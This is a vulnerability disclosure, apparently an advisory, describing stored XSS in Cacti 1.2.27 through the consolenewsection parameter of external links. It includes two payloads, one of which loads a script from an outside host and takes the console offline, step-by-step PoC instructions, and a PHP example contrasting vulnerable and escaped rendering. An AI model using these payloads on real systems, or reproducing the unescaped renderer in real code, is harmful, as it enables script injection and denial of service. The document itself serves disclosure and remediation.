Summary
The consolenewsection parameter is not properly sanitized when saving external links in links.php. Moreover, the stored consolenewsection value is written to the database and reflected back to the user in index.php, leading to stored XSS.
Details
Users with the privilege to create external links can manipulate the "consolenewsection" parameter in the HTTP POST request sent while creating an external link to perform stored XSS attacks. XSS (Cross-Site Scripting) occurs when an application allows untrusted user input to be rendered on a web page without proper validation or escaping.
The screenshot below shows the tester entering the payload <svg/onload=alert()> to prove the existence of the XSS vulnerability.
The screenshot below shows the HTTP POST request that was sent. As seen, the payload resides in the consolenewsection parameter.
The screenshot below shows that the external link is created in the console menu and is visible there. It also shows the version of Cacti under test, which is 1.2.27.
The screenshot below shows that the alert box popped up; therefore, the existence of the XSS vulnerability is proven.
This XSS vulnerability is limited by the fact that the consolenewsection parameter does not accept long strings. Therefore, with the payload in its current form, this vulnerability impacts neither confidentiality nor integrity. However, as seen in the screenshots below, the payload <script/src=//⑮.rs causes a denial of service in the frontend, rendering the application unavailable.
As seen in the screenshot below, clicking any item in the console menu no longer shows the returned data. One cannot even delete the external link causing the issue. I had to delete the external link information from the database to be able to resume normal operations.
Below is the screenshot of the vulnerable code.
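To make the save-and-render path concrete, here is an added example (not Cacti's own code and not the code in the screenshot): a hypothetical console menu section renderer in its vulnerable form, emitting the stored value verbatim, beside a hardened form that validates the name on input and escapes it on output.

```php
<?php
// Added example, not Cacti's code. The helper names and the HTML structure
// are assumptions modelling how a stored console section name reaches index.php.

// Vulnerable pattern: the value stored from the POST request is emitted as-is,
// so any markup it contains is interpreted by the browser.
function render_section_vulnerable(string $section): string
{
    return "<li class=\"menuSection\">{$section}</li>";
}

// Input validation at save time: a bounded length and a conservative character
// set for what is only ever a menu label (limits are an assumption).
function validate_section_name(string $section): bool
{
    return (bool) preg_match('/^[A-Za-z0-9 _\-]{1,40}$/', $section);
}

// Output encoding at render time: the value becomes literal text, so an
// unterminated "<script" can no longer swallow the rest of the page either.
function render_section_safe(string $section): string
{
    $escaped = htmlspecialchars($section, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<li class=\"menuSection\">{$escaped}</li>";
}

// Constructed inputs: the first payload from this report and an unterminated
// script tag pointing at a placeholder host.
$samples = ['Graphs', '<svg/onload=alert()>', '<script/src=//placeholder.invalid'];

foreach ($samples as $name) {
    printf("input      : %s\n", $name);
    printf("valid      : %s\n", validate_section_name($name) ? 'yes' : 'no');
    printf("vulnerable : %s\n", render_section_vulnerable($name));
    printf("hardened   : %s\n\n", render_section_safe($name));
}
```

Only the first sample passes validation; for the other two the vulnerable renderer emits live markup while the hardened one emits inert `&lt;...` text.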
PoC
Payload1: <svg/onload=alert()>
Payload2: <script/src=//⑮.rs
- Go to External Links under the Utilities menu.
- Click the + sign to add a new external link.
- Choose Console Menu as the style.
- Choose New Name Below as the Console Menu Section.
- Enter payload1 or payload2 as the New Console Section (this is the consolenewsection parameter).
- Give a Tab/Menu Name.
- Add any Web URL Location.
- Click Save.
- Finally, click Main Console (index.php) to trigger the XSS (one may need to refresh the page).
Impact
Denial of Service